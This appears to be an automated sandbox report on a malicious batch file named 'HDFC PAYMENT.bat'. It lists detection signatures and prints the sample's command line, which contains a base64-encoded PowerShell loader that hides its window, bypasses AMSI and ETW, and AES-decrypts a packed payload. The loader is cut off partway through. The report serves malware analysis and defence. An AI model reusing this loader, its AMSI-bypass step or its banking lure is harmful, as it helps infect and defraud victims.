Windows
Analysis Report
HDFC PAYMENT.bat
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Suspicious command line found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
cmd.exe (PID: 7532 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\HDFC PAYMENT.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7540 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7584 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\HDFC P AYMENT.bat " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7640 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\Deskt op\HDFC PA YMENT.bat' ;iex ([Sys tem.Text.E ncoding]:: UTF8.GetSt ring([Conv ert]::From Base64Stri ng("cG93ZX JzaGVsbCAt dyBoaWRkZW 47aWV4ICgo JChbVGV4dC 5FbmNvZGlu Z106OlVURj guR2V0U3Ry aW5nKFtDb2 52ZXJ0XTo6 RnJvbUJhc2 U2NFN0cmlu ZygnVTFSU1 NVNUhVa0ZP UkU5TmFWTl VVa2xPUjFK QlRrUlBUV1 ZUVkZKSlRr ZFNRVTVFVD AxNElDZ29h Vk5VVWtsT1 IxSkJUa1JQ VFhkVFZGSk pUa2RTUVU1 RVQwMXlVMV JTU1U1SFVr Rk9SRTlOSU MxVFZGSkpU a2RTUVU1RV QwMVZVMVJT U1U1SFVrRk 9SRTlOYzFO VVVrbE9SMU pCVGtSUFRX VlRWRkpKVG tkU1FVNUVU MDFDVTFSU1 NVNUhVa0ZP UkU5TllWTl VVa2xPUjFK QlRrUlBUWE 5UVkZKSlRr ZFNRVTVFVD AxcFUxUlNT VTVIVWtGT1 JFOU5ZMU5V VWtsT1IxSk JUa1JQVFZC VFZGSkpUa2 RTUVU1RVQw MWhVMVJTU1 U1SFVrRk9S RTlOY2xOVV VrbE9SMUpC VGtSUFRYTl RWRkpKVGtk U1FVNUVUMD FwVTFSU1NV NUhVa0ZPUk U5TmJsTlVV a2xPUjFKQl RrUlBUV2RU VkZKSlRrZF NRVTVFVDAw Z0lsTlVVa2 xPUjFKQlRr UlBUV2hUVk ZKSlRrZFNR VTVFVDAxMG RIQnpVMVJT U1U1SFVrRk 9SRTlOT2xO VVVrbE9SMU pCVGtSUFRT OVRWRkpKVG tkU1FVNUVU MDB2VTFSU1 NVNUhVa0ZP UkU5Tk1GTl VVa2xPUjFK QlRrUlBUWG hUVkZKSlRr ZFNRVTVFVD Awd1UxUlNT VTVIVWtGT1 JFOU5MbE5V VWtsT1IxSk JUa1JQVFhO VFZGSkpUa2 RTUVU1RVQw MTBVMVJTU1 U1SFVrRk9S RTlOTDFOVV VrbE9SMUpC VGtSUFRUaF RWRkpKVGtk U1FVNUVUMD FhVTFSU1NV NUhVa0ZPUk U5TlJGTlVV a2xPUjFKQl RrUlBUV0ZU VkZKSlRrZF NRVTVFVDAw dVUxUlNTVT VIVWtGT1JF OU5kRk5VVW tsT1IxSkJU a1JQVFhoVF ZGSkpUa2RT UVU1RVQwMT BVMVJTU1U1 SFVrRk9SRT lOSWlrdVEy OXVkR1Z1ZE M1U1pYQnNZ V05sS0NkQl FrTW5MQ2Nu S1NrZ0xVVn ljbTl5UVdO MGFXOXVJRk 5wYkdWdWRH eDVRMjl1ZE dsdWRXVTcn KSkpKSAtcm VwbGFjZSAn U1RSSU5HUk FORE9NJywg JycpO3RyeX sgSW52b2tl LVN5c3RlbU Ftc2lCeXBh c3MgLURpc2 FibGVFVFcg LUVycm9yQW N0aW9uIFN0 b3AgfWNhdG NoeyBXcml0 ZS1PdXRwdX QgIlRoaXMg c3lzdGVtIG hhcyBhIG1v ZGlmaWVkIE FNU0kiIH07 ZnVuY3Rpb2 4gRFpXT00o JHBhcmFtX3 Zhcil7JGFl c192YXI9W1 N5c3RlbS5T ZWN1cml0eS 5DcnlwdG9n cmFwaHkuQW VzXTo6Q3Jl YXRlKCk7JG Flc192YXIu TW9kZT1bU3 lzdGVtLlNl Y3VyaXR5Lk NyeXB0b2dy YXBoeS5DaX BoZXJNb2Rl XTo6Q0JDOy RhZXNfdmFy LlBhZGRpbm c9W1N5c3Rl bS5TZWN1cm l0eS5Dcnlw dG9ncmFwaH kuUGFkZGlu Z01vZGVdOj pQS0NTNzsk YWVzX3Zhci 5LZXk9W1N5 c3RlbS5Db2 52ZXJ0XTo6 RnJvbUJhc2 U2NFN0cmlu ZygnRG1mMk dLcjRRanVw MDAxS08rbl F6UW1xMzM1 azJLdFh5Mk g5UE1Gbnlz Zz0nKTskYW VzX3Zhci5J Vj1bU3lzdG VtLkNvbnZl cnRdOjpGcm 9tQmFzZTY0 U3RyaW5nKC d3emN1VzhY UFVIZzBKck tHMXIzTzZR PT0nKTskSV VSSFo9JGFl c192YXIuQ3 JlYXRlRGVj cnlwdG9yKC k7JExKWlRF PSRJVVJIWi 5UcmFuc2Zv cm1GaW5hbE Jsb2NrKCRw YXJhbV92YX IsMCwkcGFy YW1fdmFyLk xlbmd0aCk7 JElVUkhaLk Rpc3Bvc2Uo KTskYWVzX3 Zhci5EaXNw b3NlKCk7JE xKWlRFO31m dW5jdGlvbi BkZWNvbXBy ZXNzX2Z1bm N0aW9uKCRw YXJhbV92YX IpeyRMWEpU Qz1OZXctT2 JqZWN0IFN5 c3RlbS5JTy 5NZW1vcnlT dHJlYW0oLC RwYXJhbV92 YXIpOyRWVl BMVj1OZXct